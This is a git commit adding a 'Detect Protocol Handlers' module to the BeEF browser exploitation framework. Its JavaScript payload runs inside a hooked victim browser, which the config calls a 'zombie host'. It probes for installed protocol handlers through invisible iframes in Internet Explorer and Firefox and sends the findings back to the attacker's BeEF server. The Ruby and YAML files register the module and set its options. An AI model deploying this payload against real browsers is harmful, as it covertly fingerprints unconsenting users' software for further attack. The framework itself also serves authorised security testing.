Added Detect Protocol Handlers module

git-svn-id: https://beef.googlecode.com/svn/trunk@1332 b87d56ec-f9c0-11de-8c8a-61c5e9addfc9
2011-09-30 13:24:35 +00:00
parent 48e2fbbbb5
commit 882e2e8b66
3 changed files with 137 additions and 0 deletions
--- a/modules/host/detect_protocol_handlers/command.js
+++ b/modules/host/detect_protocol_handlers/command.js
@@ -0,0 +1,78 @@
+//
+//   Copyright 2011 Wade Alcorn wade@bindshell.net
+//
+//   Licensed under the Apache License, Version 2.0 (the "License");
+//   you may not use this file except in compliance with the License.
+//   You may obtain a copy of the License at
+//
+//       http://www.apache.org/licenses/LICENSE-2.0
+//
+//   Unless required by applicable law or agreed to in writing, software
+//   distributed under the License is distributed on an "AS IS" BASIS,
+//   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+//   See the License for the specific language governing permissions and
+//   limitations under the License.
+//
+beef.execute(function() {
+
+	// Initialize
+	var handler_results = new Array;
+	var handler_protocol = "<%= @handler_protocol %>".split(/\s*,\s*/);
+	var handler_addr = "<%= @handler_addr %>";
+	var iframe = beef.dom.createInvisibleIframe();
+
+	// Internet Explorer
+	if (beef.browser.isIE()) {
+
+		var protocol_link = document.createElement('a');
+		protocol_link.setAttribute('id', "protocol_link");
+		protocol_link.setAttribute('href', "");
+		iframe.contentWindow.document.appendChild(protocol_link);
+
+		for (var i=0; i<handler_protocol.length; i++) {
+			var result = "";
+			var protocol = handler_protocol[i];
+			try {
+				var anchor = iframe.contentWindow.document.getElementById("protocol_link");
+				anchor.href = protocol+"://"+handler_addr;
+				if (anchor.protocolLong == "Unknown Protocol")
+				     result = protocol + " unknown";
+				else result = protocol + " exists";
+			} catch(e) {
+				result = protocol + " does not exist";
+			}
+			handler_results.push(result);
+		}
+		iframe.contentWindow.document.removeChild(protocol_link);
+	}
+
+	// Firefox
+	if (beef.browser.isFF()) {
+
+		var protocol_iframe = document.createElement('iframe');
+		protocol_iframe.setAttribute('id', "protocol_iframe_<%= @command_id %>");
+		protocol_iframe.setAttribute('src', "");
+		protocol_iframe.setAttribute('style', "display:none;height:1px;width:1px;border:none");
+		document.body.appendChild(protocol_iframe);
+
+		for (var i=0; i<handler_protocol.length; i++) {
+			var result = "";
+			var protocol = handler_protocol[i];
+			try {
+				document.getElementById('protocol_iframe_<%= @command_id %>').contentWindow.location = protocol+"://"+handler_addr;
+			} catch(e) {
+				if (e.name == "NS_ERROR_UNKNOWN_PROTOCOL")
+				     result = protocol + " does not exist";
+				else result = protocol + " unknown";
+			}
+			if (!result) result = protocol + " exists";
+			handler_results.push(result);
+		}
+		setTimeout("document.body.removeChild(document.getElementById('protocol_iframe_<%= @command_id %>'));",3000);
+	}
+
+	// Return results
+	beef.net.send('<%= @command_url %>', <%= @command_id %>, 'handlers='+JSON.stringify(handler_results));
+
+});
+
--- a/modules/host/detect_protocol_handlers/config.yaml
+++ b/modules/host/detect_protocol_handlers/config.yaml
@@ -0,0 +1,27 @@
+#
+#   Copyright 2011 Wade Alcorn wade@bindshell.net
+#
+#   Licensed under the Apache License, Version 2.0 (the "License");
+#   you may not use this file except in compliance with the License.
+#   You may obtain a copy of the License at
+#
+#       http://www.apache.org/licenses/LICENSE-2.0
+#
+#   Unless required by applicable law or agreed to in writing, software
+#   distributed under the License is distributed on an "AS IS" BASIS,
+#   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+#   See the License for the specific language governing permissions and
+#   limitations under the License.
+#
+beef:
+    module:
+        detect_protocol_handlers:
+            enable: true
+            category: "Host"
+            name: "Detect Protocol Handlers"
+            description: "This module attempts to identify protocol handlers present on the zombie host.<br /><br />Only Internet Explorer and Firefox are supported.<br /><br />Firefox users are prompted to launch the application for which the protocol handler is responsible.<br /><br />Firefox users are warned when there is no application assigned to a protocol handler.<br /><br />The possible return values are: unknown, exists, does not exist"
+            authors: ["bcoles"]
+            target:
+                working: ["IE"]
+                user_notify: ["FF"]
+                not_working: ["ALL"]
--- a/modules/host/detect_protocol_handlers/module.rb
+++ b/modules/host/detect_protocol_handlers/module.rb
@@ -0,0 +1,32 @@
+#
+#   Copyright 2011 Wade Alcorn wade@bindshell.net
+#
+#   Licensed under the Apache License, Version 2.0 (the "License");
+#   you may not use this file except in compliance with the License.
+#   You may obtain a copy of the License at
+#
+#       http://www.apache.org/licenses/LICENSE-2.0
+#
+#   Unless required by applicable law or agreed to in writing, software
+#   distributed under the License is distributed on an "AS IS" BASIS,
+#   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+#   See the License for the specific language governing permissions and
+#   limitations under the License.
+#
+# Some additional protocol handlers #
+# ChromeHTML, code, Explorer.AssocProtocol.search-ms, FirefoxURL, gopher, icy, ie.http, ie.https, ie.ftp, iehistory, ierss, irc, itms, magnet, mapi, mms, mmst, mmsu, msbd, msdigitallocker, nntp, opera.protocol, outlook, pcast, rlogin, sc, search, search-ms, shout, skype, snews, steam, stssync, teamspeak, tel, telnet, tn3270, ts3file, ts3server, unsv, uvox, ventrilo, winamp, WindowsCalendar.UrlWebcal.1, WindowsMail.Url.Mailto, WindowsMail.Url.news, WindowsMail.Url.nntp, WindowsMail.Url.snews, WMP11.AssocProtocol.MMS, wpc
+
+class Detect_protocol_handlers < BeEF::Core::Command
+  
+  def self.options
+    return [
+	{ 'ui_label'=>'Link Protocol(s)', 'name'=>'handler_protocol', 'description' => 'Comma separated list of protocol handlers', 'value'=>'http, https, ftp, file, mailto, news, feed, ldap', 'width'=>'200px' },
+        { 'ui_label'=>'Link Address', 'name'=>'handler_addr', 'description' => 'Handler Address - usually an IP address or domain name. The user will see this.', 'value'=>'Hello-From-BeEF', 'width'=>'200px' },
+    ]
+  end
+
+  def post_execute
+    save({'handlers' => @datastore['handlers']})
+  end
+  
+end